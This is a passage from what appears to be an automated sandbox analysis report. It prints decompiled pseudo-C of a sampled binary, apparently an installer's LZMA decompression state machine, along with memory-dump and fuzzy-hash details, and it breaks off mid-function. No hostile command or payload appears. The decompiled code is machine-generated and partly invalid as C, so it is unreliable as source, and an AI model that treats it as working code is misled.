              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              										 *__esi = __dx;
              									}
              									__eflags =  *(__ebp - 0x10) - 0x1000000;
              									if( *(__ebp - 0x10) >= 0x1000000) {
              										L111:
              										_t368 = __ebp - 0x48;
              										 *_t368 =  *(__ebp - 0x48) + 1;
              										__eflags =  *_t368;
              										goto L112;
              									} else {
              										goto L109;
              									}
              								}
              								__ecx =  *(__ebp - 0xc);
              								__ebx = __ebx + __ebx;
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
              								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              								 *(__ebp - 0x44) = __ebx;
              								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
              									__ecx =  *(__ebp - 0x10);
              									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
              									__ebx = __ebx | 0x00000001;
              									__eflags = __ebx;
              									 *(__ebp - 0x44) = __ebx;
              								}
              								__eflags =  *(__ebp - 0x10) - 0x1000000;
              								if( *(__ebp - 0x10) >= 0x1000000) {
              									L101:
              									_t338 = __ebp - 0x48;
              									 *_t338 =  *(__ebp - 0x48) - 1;
              									__eflags =  *_t338;
              									goto L102;
              								} else {
              									goto L99;
              								}
              							}
              							__edx =  *(__ebp - 4);
              							__eax = __eax - __ebx;
              							 *(__ebp - 0x40) = __ecx;
              							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
              							goto L108;
              						case 0x1a:
              							L56:
              							__eflags =  *(__ebp - 0x64);
              							if( *(__ebp - 0x64) == 0) {
              								 *(__ebp - 0x88) = 0x1a;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x68);
              							__al =  *(__ebp - 0x5c);
              							__edx =  *(__ebp - 8);
              							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              							 *( *(__ebp - 0x68)) = __al;
              							__ecx =  *(__ebp - 0x14);
              							 *(__ecx +  *(__ebp - 8)) = __al;
              							__eax = __ecx + 1;
              							__edx = 0;
              							_t192 = __eax %  *(__ebp - 0x74);
              							__eax = __eax /  *(__ebp - 0x74);
              							__edx = _t192;
              							goto L79;
              						case 0x1b:
              							goto L75;
              						case 0x1c:
              							while(1) {
              								L123:
              								__eflags =  *(__ebp - 0x64);
              								if( *(__ebp - 0x64) == 0) {
              									break;
              								}
              								__eax =  *(__ebp - 0x14);
              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              								__eflags = __eax -  *(__ebp - 0x74);
              								if(__eax >=  *(__ebp - 0x74)) {
              									__eax = __eax +  *(__ebp - 0x74);
              									__eflags = __eax;
              								}
              								__edx =  *(__ebp - 8);
              								__cl =  *(__eax + __edx);
              								__eax =  *(__ebp - 0x14);
              								 *(__ebp - 0x5c) = __cl;
              								 *(__eax + __edx) = __cl;
              								__eax = __eax + 1;
              								__edx = 0;
              								_t414 = __eax %  *(__ebp - 0x74);
              								__eax = __eax /  *(__ebp - 0x74);
              								__edx = _t414;
              								__eax =  *(__ebp - 0x68);
              								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
              								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
              								__eflags =  *(__ebp - 0x30);
              								 *( *(__ebp - 0x68)) = __cl;
              								 *(__ebp - 0x14) = _t414;
              								if( *(__ebp - 0x30) > 0) {
              									continue;
              								} else {
              									goto L80;
              								}
              							}
              							 *(__ebp - 0x88) = 0x1c;
              							goto L170;
              					}
              				}
              			}














              Memory Dump Source
              • Source File: 00000001.00000002.665305559.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000001.00000002.665292449.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665364092.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000001.00000002.665378913.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665383681.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665411947.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665438070.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665452320.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665456458.0000000000437000.00000004.00020000.sdmp
              • Associated: 00000001.00000002.665468957.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
              • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
              • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
              • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406AAC(void* __ecx) {
              				void* _v8;
              				void* _v12;
              				signed int _v16;
              				unsigned int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				signed int _v44;
              				signed int _v48;
              				signed int _v52;
              				signed int _v56;
              				signed int _v60;
              				signed int _v64;
              				signed int _v68;
              				signed int _v72;
              				signed int _v76;
              				signed int _v80;
              				signed int _v84;
              				signed int _v88;
              				signed int _v92;
              				signed int _v95;
              				signed int _v96;
              				signed int _v100;
              				signed int _v104;
              				signed int _v108;
              				signed int _v112;
              				signed int _v116;
              				signed int _v120;
              				intOrPtr _v124;
              				signed int _v128;
              				signed int _v132;
              				signed int _v136;
              				void _v140;
              				void* _v148;
              				signed int _t537;
              				signed int _t538;
              				signed int _t572;
              
              				_t572 = 0x22;
              				_v148 = __ecx;
              				memcpy( &_v140, __ecx, _t572 << 2);
              				if(_v52 == 0xffffffff) {
              					return 1;
              				}
              				while(1) {
              					L3:
              					_t537 = _v140;
              					if(_t537 > 0x1c) {
              						break;
              					}
              					switch( *((intOrPtr*)(_t537 * 4 +  &M004074FE))) {
              						case 0:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								goto L173;
              							}
              							_v112 = _v112 - 1;
              							_v116 = _v116 + 1;
              							_t537 =  *_v116;
              							__eflags = _t537 - 0xe1;
              							if(_t537 > 0xe1) {
              								goto L174;
              							}
              							_t542 = _t537 & 0x000000ff;
              							_push(0x2d);
              							asm("cdq");
              							_pop(_t576);
              							_push(9);
              							_pop(_t577);
              							_t622 = _t542 / _t576;
              							_t544 = _t542 % _t576 & 0x000000ff;
              							asm("cdq");
              							_t617 = _t544 % _t577 & 0x000000ff;
              							_v64 = _t617;
              							_v32 = (1 << _t622) - 1;
              							_v28 = (1 << _t544 / _t577) - 1;
              							_t625 = (0x300 << _t617 + _t622) + 0x736;
              							__eflags = 0x600 - _v124;
              							if(0x600 == _v124) {
              								L12:
              								__eflags = _t625;
              								if(_t625 == 0) {
              									L14:
              									_v76 = _v76 & 0x00000000;
              									_v68 = _v68 & 0x00000000;
              									goto L17;
              								} else {
              									goto L13;
              								}
              								do {
              									L13:
              									_t625 = _t625 - 1;
              									__eflags = _t625;
              									 *((short*)(_v8 + _t625 * 2)) = 0x400;
              								} while (_t625 != 0);
              								goto L14;
              							}
              							__eflags = _v8;
              							if(_v8 != 0) {
              								GlobalFree(_v8);
              							}
              							_t537 = GlobalAlloc(0x40, 0x600); // executed
              							__eflags = _t537;
              							_v8 = _t537;
              							if(_t537 == 0) {
              								goto L174;
              							} else {
              								_v124 = 0x600;
              								goto L12;
              							}
              						case 1:
              							L15:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 1;
              								goto L173;
              							}
              							_v112 = _v112 - 1;
              							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
              							_v116 = _v116 + 1;
              							_t50 =  &_v76;
              							 *_t50 = _v76 + 1;
              							__eflags =  *_t50;
              							L17:
              							__eflags = _v76 - 4;
              							if(_v76 < 4) {
              								goto L15;
              							}
              							_t550 = _v68;
              							__eflags = _t550 - _v120;
              							if(_t550 == _v120) {
              								L22:
              								_v76 = 5;
              								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
              								goto L25;
              							}
              							__eflags = _v12;
              							_v120 = _t550;
              							if(_v12 != 0) {
              								GlobalFree(_v12);
              							}
              							_t537 = GlobalAlloc(0x40, _v68); // executed
              							__eflags = _t537;
              							_v12 = _t537;
              							if(_t537 == 0) {
              								goto L174;
              							} else {
              								goto L22;
              							}
              						case 2:
              							L26:
              							_t557 = _v100 & _v32;
              							_v136 = 6;
              							_v80 = _t557;
              							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
              							goto L135;
              						case 3:
              							L23:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 3;
              								goto L173;
              							}
              							_v112 = _v112 - 1;
              							_t72 =  &_v116;
              							 *_t72 = _v116 + 1;
              							__eflags =  *_t72;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L25:
              							_v76 = _v76 - 1;
              							__eflags = _v76;
              							if(_v76 != 0) {
              								goto L23;
              							}
              							goto L26;
              						case 4:
              							L136:
              							_t559 =  *_t626;
              							_t610 = _t559 & 0x0000ffff;
              							_t591 = (_v20 >> 0xb) * _t610;
              							__eflags = _v16 - _t591;
              							if(_v16 >= _t591) {
              								_v20 = _v20 - _t591;
              								_v16 = _v16 - _t591;
              								_v68 = 1;
              								_t560 = _t559 - (_t559 >> 5);
              								__eflags = _t560;
              								 *_t626 = _t560;
              							} else {
              								_v20 = _t591;
              								_v68 = _v68 & 0x00000000;
              								 *_t626 = (0x800 - _t610 >> 5) + _t559;
              							}
              							__eflags = _v20 - 0x1000000;
              							if(_v20 >= 0x1000000) {
              								goto L142;
              							} else {
              								goto L140;
              							}
              						case 5:
              							L140:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 5;
              								goto L173;
              							}
              							_v20 = _v20 << 8;
              							_v112 = _v112 - 1;
              							_t464 =  &_v116;
              							 *_t464 = _v116 + 1;
              							__eflags =  *_t464;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L142:
              							_t561 = _v136;
              							goto L143;
              						case 6:
              							__edx = 0;
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v8;
              								__ecx = _v60;
              								_v56 = 1;
              								_v136 = 7;
              								__esi = _v8 + 0x180 + _v60 * 2;
              								goto L135;
              							}
              							__eax = _v96 & 0x000000ff;
              							__esi = _v100;
              							__cl = 8;
              							__cl = 8 - _v64;
              							__esi = _v100 & _v28;
              							__eax = (_v96 & 0x000000ff) >> 8;
              							__ecx = _v64;
              							__esi = (_v100 & _v28) << 8;
              							__ecx = _v8;
              							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
              							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
              							__eflags = _v60 - 4;
              							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
              							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
              							if(_v60 >= 4) {
              								__eflags = _v60 - 0xa;
              								if(_v60 >= 0xa) {
              									_t103 =  &_v60;
              									 *_t103 = _v60 - 6;
              									__eflags =  *_t103;
              								} else {
              									_v60 = _v60 - 3;
              								}
              							} else {
              								_v60 = 0;
              							}
              							__eflags = _v56 - __edx;
              							if(_v56 == __edx) {
              								__ebx = 0;
              								__ebx = 1;
              								goto L63;
              							}
              							__eax = _v24;
              							__eax = _v24 - _v48;
              							__eflags = __eax - _v120;
              							if(__eax >= _v120) {
              								__eax = __eax + _v120;
              								__eflags = __eax;
              							}
              							__ecx = _v12;
              							__ebx = 0;
              							__ebx = 1;
              							__al =  *((intOrPtr*)(__eax + __ecx));
              							_v95 =  *((intOrPtr*)(__eax + __ecx));
              							goto L43;
              						case 7:
              							__eflags = _v68 - 1;
              							if(_v68 != 1) {
              								__eax = _v40;
              								_v132 = 0x16;
              								_v36 = _v40;
              								__eax = _v44;
              								_v40 = _v44;
              								__eax = _v48;
              								_v44 = _v48;
              								__eax = 0;
              								__eflags = _v60 - 7;
              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              								__al = __al & 0x000000fd;
              								__eax = (__eflags >= 0) - 1 + 0xa;
              								_v60 = (__eflags >= 0) - 1 + 0xa;
              								__eax = _v8;
              								__eax = _v8 + 0x664;
              								__eflags = __eax;
              								_v92 = __eax;
              								goto L71;
              							}
              							__eax = _v8;
              							__ecx = _v60;
              							_v136 = 8;
              							__esi = _v8 + 0x198 + _v60 * 2;
              							goto L135;
              						case 8:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v8;
              								__ecx = _v60;
              								_v136 = 0xa;
              								__esi = _v8 + 0x1b0 + _v60 * 2;
              							} else {
              								__eax = _v60;
              								__ecx = _v8;
              								__eax = _v60 + 0xf;
              								_v136 = 9;
              								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
              								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
              							}
              							goto L135;
              						case 9:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								goto L92;
              							}
              							__eflags = _v100;
              							if(_v100 == 0) {
              								goto L174;
              							}
              							__eax = 0;
              							__eflags = _v60 - 7;
              							_t264 = _v60 - 7 >= 0;
              							__eflags = _t264;
              							0 | _t264 = _t264 + _t264 + 9;
              							_v60 = _t264 + _t264 + 9;
              							goto L78;
              						case 0xa:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v8;
              								__ecx = _v60;
              								_v136 = 0xb;
              								__esi = _v8 + 0x1c8 + _v60 * 2;
              								goto L135;
              							}
              							__eax = _v44;
              							goto L91;
              						case 0xb:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__ecx = _v40;
              								__eax = _v36;
              								_v36 = _v40;
              							} else {
              								__eax = _v40;
              							}
              							__ecx = _v44;
              							_v40 = _v44;
              							L91:
              							__ecx = _v48;
              							_v48 = __eax;
              							_v44 = _v48;
              							L92:
              							__eax = _v8;
              							_v132 = 0x15;
              							__eax = _v8 + 0xa68;
              							_v92 = _v8 + 0xa68;
              							goto L71;
              						case 0xc:
              							L102:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xc;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t340 =  &_v116;
              							 *_t340 = _v116 + 1;
              							__eflags =  *_t340;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							__eax = _v48;
              							goto L104;
              						case 0xd:
              							L39:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xd;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t127 =  &_v116;
              							 *_t127 = _v116 + 1;
              							__eflags =  *_t127;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L41:
              							__eax = _v68;
              							__eflags = _v76 - _v68;
              							if(_v76 != _v68) {
              								goto L50;
              							}
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								goto L56;
              							}
              							L43:
              							__eax = _v95 & 0x000000ff;
              							_v95 = _v95 << 1;
              							__ecx = _v92;
              							__eax = (_v95 & 0x000000ff) >> 7;
              							_v76 = __eax;
              							__eax = __eax + 1;
              							__eax = __eax << 8;
              							__eax = __eax + __ebx;
              							__esi = _v92 + __eax * 2;
              							_v20 = _v20 >> 0xb;
              							__ax =  *__esi;
              							_v88 = __esi;
              							__edx = __ax & 0x0000ffff;
              							__ecx = (_v20 >> 0xb) * __edx;
              							__eflags = _v16 - __ecx;
              							if(_v16 >= __ecx) {
              								_v20 = _v20 - __ecx;
              								_v16 = _v16 - __ecx;
              								__cx = __ax;
              								_v68 = 1;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								__ebx = __ebx + __ebx + 1;
              								 *__esi = __ax;
              							} else {
              								_v68 = _v68 & 0x00000000;
              								_v20 = __ecx;
              								0x800 = 0x800 - __edx;
              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags = _v20 - 0x1000000;
              							_v72 = __ebx;
              							if(_v20 >= 0x1000000) {
              								goto L41;
              							} else {
              								goto L39;
              							}
              						case 0xe:
              							L48:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xe;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t161 =  &_v116;
              							 *_t161 = _v116 + 1;
              							__eflags =  *_t161;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							while(1) {
              								L50:
              								__eflags = __ebx - 0x100;
              								if(__ebx >= 0x100) {
              									break;
              								}
              								__eax = _v92;
              								__edx = __ebx + __ebx;
              								__ecx = _v20;
              								__esi = __edx + __eax;
              								__ecx = _v20 >> 0xb;
              								__ax =  *__esi;
              								_v88 = __esi;
              								__edi = __ax & 0x0000ffff;
              								__ecx = (_v20 >> 0xb) * __edi;
              								__eflags = _v16 - __ecx;
              								if(_v16 >= __ecx) {
              									_v20 = _v20 - __ecx;
              									_v16 = _v16 - __ecx;
              									__cx = __ax;
              									_t175 = __edx + 1; // 0x1
              									__ebx = _t175;
              									__cx = __ax >> 5;
              									__eflags = __eax;
              									 *__esi = __ax;
              								} else {
              									_v20 = __ecx;
              									0x800 = 0x800 - __edi;
              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              									__ebx = __ebx + __ebx;
              									 *__esi = __cx;
              								}
              								__eflags = _v20 - 0x1000000;
              								_v72 = __ebx;
              								if(_v20 >= 0x1000000) {
              									continue;
              								} else {
              									goto L48;
              								}
              							}
              							L56:
              							_t178 =  &_v56;
              							 *_t178 = _v56 & 0x00000000;
              							__eflags =  *_t178;
              							goto L57;
              						case 0xf:
              							L60:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0xf;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t208 =  &_v116;
              							 *_t208 = _v116 + 1;
              							__eflags =  *_t208;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L62:
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								L57:
              								__al = _v72;
              								_v96 = _v72;
              								goto L58;
              							}
              							L63:
              							__eax = _v92;
              							__edx = __ebx + __ebx;
              							__ecx = _v20;
              							__esi = __edx + __eax;
              							__ecx = _v20 >> 0xb;
              							__ax =  *__esi;
              							_v88 = __esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = (_v20 >> 0xb) * __edi;
              							__eflags = _v16 - __ecx;
              							if(_v16 >= __ecx) {
              								_v20 = _v20 - __ecx;
              								_v16 = _v16 - __ecx;
              								__cx = __ax;
              								_t222 = __edx + 1; // 0x1
              								__ebx = _t222;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								 *__esi = __ax;
              							} else {
              								_v20 = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags = _v20 - 0x1000000;
              							_v72 = __ebx;
              							if(_v20 >= 0x1000000) {
              								goto L62;
              							} else {
              								goto L60;
              							}
              						case 0x10:
              							L112:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0x10;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t371 =  &_v116;
              							 *_t371 = _v116 + 1;
              							__eflags =  *_t371;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							goto L114;
              						case 0x11:
              							L71:
              							__esi = _v92;
              							_v136 = 0x12;
              							goto L135;
              						case 0x12:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v92;
              								_v136 = 0x13;
              								__esi = _v92 + 2;
              								L135:
              								_v88 = _t626;
              								goto L136;
              							}
              							__eax = _v80;
              							_v52 = _v52 & 0x00000000;
              							__ecx = _v92;
              							__eax = _v80 << 4;
              							__eflags = __eax;
              							__eax = _v92 + __eax + 4;
              							goto L133;
              						case 0x13:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								_t475 =  &_v92;
              								 *_t475 = _v92 + 0x204;
              								__eflags =  *_t475;
              								_v52 = 0x10;
              								_v68 = 8;
              								L147:
              								_v128 = 0x14;
              								goto L148;
              							}
              							__eax = _v80;
              							__ecx = _v92;
              							__eax = _v80 << 4;
              							_v52 = 8;
              							__eax = _v92 + (_v80 << 4) + 0x104;
              							L133:
              							_v92 = __eax;
              							_v68 = 3;
              							goto L147;
              						case 0x14:
              							_v52 = _v52 + __ebx;
              							__eax = _v132;
              							goto L143;
              						case 0x15:
              							__eax = 0;
              							__eflags = _v60 - 7;
              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              							__al = __al & 0x000000fd;
              							__eax = (__eflags >= 0) - 1 + 0xb;
              							_v60 = (__eflags >= 0) - 1 + 0xb;
              							goto L123;
              						case 0x16:
              							__eax = _v52;
              							__eflags = __eax - 4;
              							if(__eax >= 4) {
              								_push(3);
              								_pop(__eax);
              							}
              							__ecx = _v8;
              							_v68 = 6;
              							__eax = __eax << 7;
              							_v128 = 0x19;
              							_v92 = __eax;
              							goto L148;
              						case 0x17:
              							L148:
              							__eax = _v68;
              							_v84 = 1;
              							_v76 = _v68;
              							goto L152;
              						case 0x18:
              							L149:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0x18;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t490 =  &_v116;
              							 *_t490 = _v116 + 1;
              							__eflags =  *_t490;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L151:
              							_t493 =  &_v76;
              							 *_t493 = _v76 - 1;
              							__eflags =  *_t493;
              							L152:
              							__eflags = _v76;
              							if(_v76 <= 0) {
              								__ecx = _v68;
              								__ebx = _v84;
              								0 = 1;
              								__eax = 1 << __cl;
              								__ebx = _v84 - (1 << __cl);
              								__eax = _v128;
              								_v72 = __ebx;
              								L143:
              								_v140 = _t561;
              								goto L3;
              							}
              							__eax = _v84;
              							_v20 = _v20 >> 0xb;
              							__edx = _v84 + _v84;
              							__eax = _v92;
              							__esi = __edx + __eax;
              							_v88 = __esi;
              							__ax =  *__esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = (_v20 >> 0xb) * __edi;
              							__eflags = _v16 - __ecx;
              							if(_v16 >= __ecx) {
              								_v20 = _v20 - __ecx;
              								_v16 = _v16 - __ecx;
              								__cx = __ax;
              								__cx = __ax >> 5;
              								__eax = __eax - __ecx;
              								__edx = __edx + 1;
              								__eflags = __edx;
              								 *__esi = __ax;
              								_v84 = __edx;
              							} else {
              								_v20 = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								_v84 = _v84 << 1;
              								 *__esi = __cx;
              							}
              							__eflags = _v20 - 0x1000000;
              							if(_v20 >= 0x1000000) {
              								goto L151;
              							} else {
              								goto L149;
              							}
              						case 0x19:
              							__eflags = __ebx - 4;
              							if(__ebx < 4) {
              								_v48 = __ebx;
              								L122:
              								_t399 =  &_v48;
              								 *_t399 = _v48 + 1;
              								__eflags =  *_t399;
              								L123:
              								__eax = _v48;
              								__eflags = __eax;
              								if(__eax == 0) {
              									_v52 = _v52 | 0xffffffff;
              									goto L173;
              								}
              								__eflags = __eax - _v100;
              								if(__eax > _v100) {
              									goto L174;
              								}
              								_v52 = _v52 + 2;
              								__eax = _v52;
              								_t406 =  &_v100;
              								 *_t406 = _v100 + _v52;
              								__eflags =  *_t406;
              								goto L126;
              							}
              							__ecx = __ebx;
              							__eax = __ebx;
              							__ecx = __ebx >> 1;
              							__eax = __ebx & 0x00000001;
              							__ecx = (__ebx >> 1) - 1;
              							__al = __al | 0x00000002;
              							__eax = (__ebx & 0x00000001) << __cl;
              							__eflags = __ebx - 0xe;
              							_v48 = __eax;
              							if(__ebx >= 0xe) {
              								__ebx = 0;
              								_v76 = __ecx;
              								L105:
              								__eflags = _v76;
              								if(_v76 <= 0) {
              									__eax = __eax + __ebx;
              									_v68 = 4;
              									_v48 = __eax;
              									__eax = _v8;
              									__eax = _v8 + 0x644;
              									__eflags = __eax;
              									L111:
              									__ebx = 0;
              									_v92 = __eax;
              									_v84 = 1;
              									_v72 = 0;
              									_v76 = 0;
              									L115:
              									__eax = _v68;
              									__eflags = _v76 - _v68;
              									if(_v76 >= _v68) {
              										_t397 =  &_v48;
              										 *_t397 = _v48 + __ebx;
              										__eflags =  *_t397;
              										goto L122;
              									}
              									__eax = _v84;
              									_v20 = _v20 >> 0xb;
              									__edi = _v84 + _v84;
              									__eax = _v92;
              									__esi = __edi + __eax;
              									_v88 = __esi;
              									__ax =  *__esi;
              									__ecx = __ax & 0x0000ffff;
              									__edx = (_v20 >> 0xb) * __ecx;
              									__eflags = _v16 - __edx;
              									if(_v16 >= __edx) {
              										__ecx = 0;
              										_v20 = _v20 - __edx;
              										__ecx = 1;
              										_v16 = _v16 - __edx;
              										__ebx = 1;
              										__ecx = _v76;
              										__ebx = 1 << __cl;
              										__ecx = 1 << __cl;
              										__ebx = _v72;
              										__ebx = _v72 | __ecx;
              										__cx = __ax;
              										__cx = __ax >> 5;
              										__eax = __eax - __ecx;
              										__edi = __edi + 1;
              										__eflags = __edi;
              										_v72 = __ebx;
              										 *__esi = __ax;
              										_v84 = __edi;
              									} else {
              										_v20 = __edx;
              										0x800 = 0x800 - __ecx;
              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              										_v84 = _v84 << 1;
              										 *__esi = __dx;
              									}
              									__eflags = _v20 - 0x1000000;
              									if(_v20 >= 0x1000000) {
              										L114:
              										_t374 =  &_v76;
              										 *_t374 = _v76 + 1;
              										__eflags =  *_t374;
              										goto L115;
              									} else {
              										goto L112;
              									}
              								}
              								__ecx = _v16;
              								__ebx = __ebx + __ebx;
              								_v20 = _v20 >> 1;
              								__eflags = _v16 - _v20;
              								_v72 = __ebx;
              								if(_v16 >= _v20) {
              									__ecx = _v20;
              									_v16 = _v16 - _v20;
              									__ebx = __ebx | 0x00000001;
              									__eflags = __ebx;
              									_v72 = __ebx;
              								}
              								__eflags = _v20 - 0x1000000;
              								if(_v20 >= 0x1000000) {
              									L104:
              									_t344 =  &_v76;
              									 *_t344 = _v76 - 1;
              									__eflags =  *_t344;
              									goto L105;
              								} else {
              									goto L102;
              								}
              							}
              							__edx = _v8;
              							__eax = __eax - __ebx;
              							_v68 = __ecx;
              							__eax = _v8 + 0x55e + __eax * 2;
              							goto L111;
              						case 0x1a:
              							L58:
              							__eflags = _v104;
              							if(_v104 == 0) {
              								_v140 = 0x1a;
              								goto L173;
              							}
              							__ecx = _v108;
              							__al = _v96;
              							__edx = _v12;
              							_v100 = _v100 + 1;
              							_v108 = _v108 + 1;
              							_v104 = _v104 - 1;
              							 *_v108 = __al;
              							__ecx = _v24;
              							 *(_v12 + __ecx) = __al;
              							__eax = __ecx + 1;
              							__edx = 0;
              							_t197 = __eax % _v120;
              							__eax = __eax / _v120;
              							__edx = _t197;
              							goto L82;
              						case 0x1b:
              							L78:
              							__eflags = _v104;
              							if(_v104 == 0) {
              								_v140 = 0x1b;
              								goto L173;
              							}
              							__eax = _v24;
              							__eax = _v24 - _v48;
              							__eflags = __eax - _v120;
              							if(__eax >= _v120) {
              								__eax = __eax + _v120;
              								__eflags = __eax;
              							}
              							__edx = _v12;
              							__cl =  *(__edx + __eax);
              							__eax = _v24;
              							_v96 = __cl;
              							 *(__edx + __eax) = __cl;
              							__eax = __eax + 1;
              							__edx = 0;
              							_t280 = __eax % _v120;
